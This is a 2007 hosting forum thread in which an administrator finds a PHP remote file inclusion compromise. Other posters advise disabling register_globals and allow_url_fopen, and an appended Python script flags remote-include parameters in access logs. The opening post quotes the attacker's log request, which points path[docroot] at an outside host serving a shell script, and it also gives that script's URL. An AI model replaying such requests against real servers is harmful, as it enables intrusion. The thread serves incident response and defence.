PHP exploit
Posted by samsamdb, 11-25-2007, 04:00 PM |
Just discovered a php exploit on a client's domain.
Found this in the access_log
http://www.domain.com/blog.php/onead...nhead.php?path[docroot]=http://musicrox1.altervista.org/rmod.txt?&act=ls&d=/home/httpd/vhosts/domain.com/httpdocs/pearus/.bash/&sort=0a
Take a look at rmod.txt
http://musicrox1.altervista.org/rmod.txt
then found this in a conf.txt in the /pearus/.bash folder
contents of the .bash folder:
Still trying to dig in some more to figure out how they were able to exploit
here's the first few lines of their blog.php
If anyone can think of anything else to dig for, please post ..
thanks
|
Posted by Harzem, 11-25-2007, 04:04 PM |
Is register_globals on?
|
Posted by Steve_Arm, 11-25-2007, 04:06 PM |
Where is $path["docroot"] validated to be what it should be?
You need to make this false:
http://gr2.php.net/manual/en/ref.fil...llow-url-fopen
|
Posted by samsamdb, 11-25-2007, 04:07 PM |
"PHP 'safe_mode' on" is unchecked in the Plesk control panel for that domain.
but register_globals is On in the php.ini
|
Posted by samsamdb, 11-25-2007, 04:08 PM |
I guess that's where the exploit is .. the customer didn't do any error checking so anyone can override docroot by passing it in the URL parameters ....
|
Posted by Harzem, 11-25-2007, 04:10 PM |
That's where the exploit is. Turn off register_globals at all prices.
|
Posted by samsamdb, 11-25-2007, 04:17 PM |
Done .. globals now off .. if a customer doesn't like it .. let's see what complaints come in ...
|
Posted by Harzem, 11-25-2007, 04:33 PM |
The users that use php scripts written in 1985 will complain. If too much is received, you should warn them about security and add a htaccess file for those you want. But let them know they will be asking for trouble.
|
Posted by samsamdb, 11-25-2007, 04:39 PM |
I don't mind that at all ... if they complain, I'll threaten them with "Harzem"! :-)
|
Posted by foobic, 11-25-2007, 06:29 PM |
It's a good idea to turn off register_globals but it won't necessarily solve this problem (although with a bit of luck it may break the script altogether!). Even with register_globals off badly-written scripts that don't validate user inputs can still be vulnerable to remote includes.
So don't ignore the other good advice:
|
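The access_log entry quoted at the top of the thread has a recognisable shape: a request parameter (there, path[docroot]) whose value is itself a URL. The following added example, which is not code from any poster in the thread, scans combined-format access log lines for such parameters, including percent-encoded ones. The log lines, hosts, paths and IPs in it are constructed placeholders, and the function names are hypothetical.

```python
import re
from urllib.parse import parse_qsl

# Combined-log layout: client IP first, request line in double quotes.
LINE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Stream wrappers that PHP include()/fopen() can resolve to remote or
# request-supplied content.
WRAPPER = re.compile(r'^(?:(?:https?|ftps?|php|expect)://|data:)', re.I)

def remote_include_params(log_line):
    """Return (ip, script, param, value) for every query parameter whose
    decoded value starts with a URL or stream wrapper."""
    m = LINE.match(log_line)
    if not m:
        return []          # not a request line we understand
    ip, target = m.groups()
    script, _, query = target.partition("?")
    # parse_qsl percent-decodes names and values, so http%3A%2F%2F...
    # is caught the same way as a plain http://...
    return [(ip, script, name, value)
            for name, value in parse_qsl(query)
            if WRAPPER.match(value.strip())]

def scan(lines):
    """Collect hits across many log lines, in log order."""
    hits = []
    for line in lines:
        hits.extend(remote_include_params(line))
    return hits

# Constructed sample lines (not taken from the thread's server).
SAMPLE_LOG = [
    '203.0.113.7 - - [25/Nov/2007:15:41:02 -0500] '
    '"GET /blog.php?page=2 HTTP/1.1" 200 5120',
    '198.51.100.23 - - [25/Nov/2007:15:42:10 -0500] '
    '"GET /inc/head.php?path[docroot]=http://remote.example/r.txt?'
    '&act=ls&sort=0a HTTP/1.1" 200 812',
    '198.51.100.23 - - [25/Nov/2007:15:42:31 -0500] '
    '"GET /inc/head.php?path%5Bdocroot%5D=http%3A%2F%2Fremote.example'
    '%2Fr.txt%3F HTTP/1.1" 200 790',
]

if __name__ == "__main__":
    for ip, script, name, value in scan(SAMPLE_LOG):
        print(f"{ip} {script} {name} -> {value}")
```

Parameters that legitimately carry URLs (a redirect target, for instance) match too, so each hit is a lead to check against what the script does with that parameter.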